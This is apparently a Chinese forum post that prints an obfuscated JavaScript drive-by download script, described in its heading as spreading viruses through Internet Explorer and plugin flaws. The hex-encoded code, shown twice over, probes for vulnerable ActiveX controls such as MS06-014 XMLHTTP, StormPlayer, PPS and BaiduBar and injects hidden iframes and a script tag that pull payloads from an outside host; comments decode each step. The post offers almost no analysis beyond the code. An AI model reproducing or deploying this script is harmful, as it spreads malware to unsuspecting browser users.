一段加密的Javascript风险代码,利用IE及其插件漏洞传播病毒:
var vDA1 = new window["/x44/x61/x74/x65"]()
//date
vDA1["/x73/x65/x74/x54/x69/x6d/x65"](vDA1["/x67/x65/x74/x54/x69/x6d/x65"]() + 24*60*60*1000)
//setTime getTime
var eOTo$2 = new window["/x53/x74/x72/x69/x6e/x67"](window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x63/x6f/x6f/x6b/x69/x65"])
//String document cookie
var eZT3 = "/x43/x6f/x6f/x6b/x69/x65/x31/x3d"
//Cookie1=
var VMliYvVKu4 = eOTo$2["/x69/x6e/x64/x65/x78/x4f/x66"](eZT3)
//indexOf
if (VMliYvVKu4 == -1)
{
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x63/x6f/x6f/x6b/x69/x65"] = "/x43/x6f/x6f/x6b/x69/x65/x31/x3d/x50/x4f/x50/x57/x49/x4e/x44/x4f/x53/x3b/x65/x78/x70/x69/x72/x65/x73/x3d"+ vDA1["/x74/x6f/x47/x4d/x54/x53/x74/x72/x69/x6e/x67"]()
//document cookie Cookie1=POPWINDOS;expires= toGMTString
try{if(new ActiveXObject("/x4d/x69/x63/x72/x6f/x73/x6f/x66/x74/x2e/x58/x4d/x4c/x48/x54/x54/x50"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x73/x63/x72/x69/x70/x74 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x4e/x6f/x50/x2e/x67/x73///x73/x33/x36/x38///x4e/x65/x77/x4a/x73/x31/x2e/x6a/x73/x22/x3e/x3c///x73/x63/x72/x69/x70/x74/x3e');}catch(e){} // ms06014
//Microsoft.XMLHTTP document write <script src="http://NoP.gs/s368/NewJs1.js"></script>
try{if(new ActiveXObject("/x44/x50/x43/x6c/x69/x65/x6e/x74/x2e/x56/x6f/x64"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x74/x33/x36/x38/x6f/x6b/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // XL
//DPClient.Vod document write <iframe style=display:none src="http://NoP.gs/s368/t368ok.gif"></iframe>
try{if(new ActiveXObject("/x4d/x50/x53/x2e/x53/x74/x6f/x72/x6d/x50/x6c/x61/x79/x65/x72/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x47/x6f/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // BF
//MPS.StormPlayer.1 document write <iframe style=display:none src="http://NoP.gs/s368/Go368.gif"></iframe>
try{if(new ActiveXObject("/x50/x4f/x57/x45/x52/x50/x4c/x41/x59/x45/x52/x2e/x50/x6f/x77/x65/x72/x50/x6c/x61/x79/x65/x72/x43/x74/x72/x6c/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x54/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // PPS
//POWERPLAYER.PowerPlayerCtrl.1 document write <iframe style=display:none src="http://NoP.gs/s368/T368.gif"></iframe>
try{if(new ActiveXObject("/x50/x64/x67/x32"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x72/x65/x61/x64/x65/x72/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // CX
//Pdg2 document write <iframe style=display:none src="http://NoP.gs/s368/reader368.gif"></iframe>
try{if(new ActiveXObject("/x47/x4c/x43/x48/x41/x54/x2e/x47/x4c/x43/x68/x61/x74/x43/x74/x72/x6c/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x4c/x69/x6e/x6b/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // LZ
//GLCHAT.GLChatCtrl.1 document write <iframe style=display:none
src="http://NoP.gs/s368/Link368.gif"></iframe>
try{if(new ActiveXObject("/x42/x61/x69/x64/x75/x42/x61/x72/x2e/x54/x6f/x6f/x6c/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x50/x69/x63/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // Baidu
//BaiduBar.Tool.1 document write <iframe style=display:none src="http://NoP.gs/s368/Pic368.gif"></iframe>
}
var vDA1 = new window["/x44/x61/x74/x65"]()
//date
vDA1["/x73/x65/x74/x54/x69/x6d/x65"](vDA1["/x67/x65/x74/x54/x69/x6d/x65"]() + 24*60*60*1000)
//setTime getTime
var eOTo$2 = new window["/x53/x74/x72/x69/x6e/x67"](window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x63/x6f/x6f/x6b/x69/x65"])
//String document cookie
var eZT3 = "/x43/x6f/x6f/x6b/x69/x65/x31/x3d"
//Cookie1=
var VMliYvVKu4 = eOTo$2["/x69/x6e/x64/x65/x78/x4f/x66"](eZT3)
//indexOf
if (VMliYvVKu4 == -1)
{
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x63/x6f/x6f/x6b/x69/x65"] = "/x43/x6f/x6f/x6b/x69/x65/x31/x3d/x50/x4f/x50/x57/x49/x4e/x44/x4f/x53/x3b/x65/x78/x70/x69/x72/x65/x73/x3d"+ vDA1["/x74/x6f/x47/x4d/x54/x53/x74/x72/x69/x6e/x67"]()
//document cookie Cookie1=POPWINDOS;expires= toGMTString
try{if(new ActiveXObject("/x4d/x69/x63/x72/x6f/x73/x6f/x66/x74/x2e/x58/x4d/x4c/x48/x54/x54/x50"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x73/x63/x72/x69/x70/x74 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x4e/x6f/x50/x2e/x67/x73///x73/x33/x36/x38///x4e/x65/x77/x4a/x73/x31/x2e/x6a/x73/x22/x3e/x3c///x73/x63/x72/x69/x70/x74/x3e');}catch(e){} // ms06014
//Microsoft.XMLHTTP document write <script src="http://NoP.gs/s368/NewJs1.js"></script>
try{if(new ActiveXObject("/x44/x50/x43/x6c/x69/x65/x6e/x74/x2e/x56/x6f/x64"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x74/x33/x36/x38/x6f/x6b/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // XL
//DPClient.Vod document write <iframe style=display:none src="http://NoP.gs/s368/t368ok.gif"></iframe>
try{if(new ActiveXObject("/x4d/x50/x53/x2e/x53/x74/x6f/x72/x6d/x50/x6c/x61/x79/x65/x72/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x47/x6f/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // BF
//MPS.StormPlayer.1 document write <iframe style=display:none src="http://NoP.gs/s368/Go368.gif"></iframe>
try{if(new ActiveXObject("/x50/x4f/x57/x45/x52/x50/x4c/x41/x59/x45/x52/x2e/x50/x6f/x77/x65/x72/x50/x6c/x61/x79/x65/x72/x43/x74/x72/x6c/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x54/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // PPS
//POWERPLAYER.PowerPlayerCtrl.1 document write <iframe style=display:none src="http://NoP.gs/s368/T368.gif"></iframe>
try{if(new ActiveXObject("/x50/x64/x67/x32"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x72/x65/x61/x64/x65/x72/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // CX
//Pdg2 document write <iframe style=display:none src="http://NoP.gs/s368/reader368.gif"></iframe>
try{if(new ActiveXObject("/x47/x4c/x43/x48/x41/x54/x2e/x47/x4c/x43/x68/x61/x74/x43/x74/x72/x6c/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x4c/x69/x6e/x6b/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // LZ
//GLCHAT.GLChatCtrl.1 document write <iframe style=display:none
src="http://NoP.gs/s368/Link368.gif"></iframe>
try{if(new ActiveXObject("/x42/x61/x69/x64/x75/x42/x61/x72/x2e/x54/x6f/x6f/x6c/x2e/x31"))window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]('/x3c/x69/x66/x72/x61/x6d/x65 /x73/x74/x79/x6c/x65/x3d/x64/x69/x73/x70/x6c/x61/x79/x3a/x6e/x6f/x6e/x65 /x73/x72/x63/x3d/x22/x68/x74/x74/x70/x3a/x2f/x2f/x4e/x6f/x50/x2e/x67/x73/x2f/x73/x33/x36/x38/x2f/x50/x69/x63/x33/x36/x38/x2e/x67/x69/x66/x22/x3e/x3c/x2f/x69/x66/x72/x61/x6d/x65/x3e');}catch(e){} // Baidu
//BaiduBar.Tool.1 document write <iframe style=display:none src="http://NoP.gs/s368/Pic368.gif"></iframe>
}
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
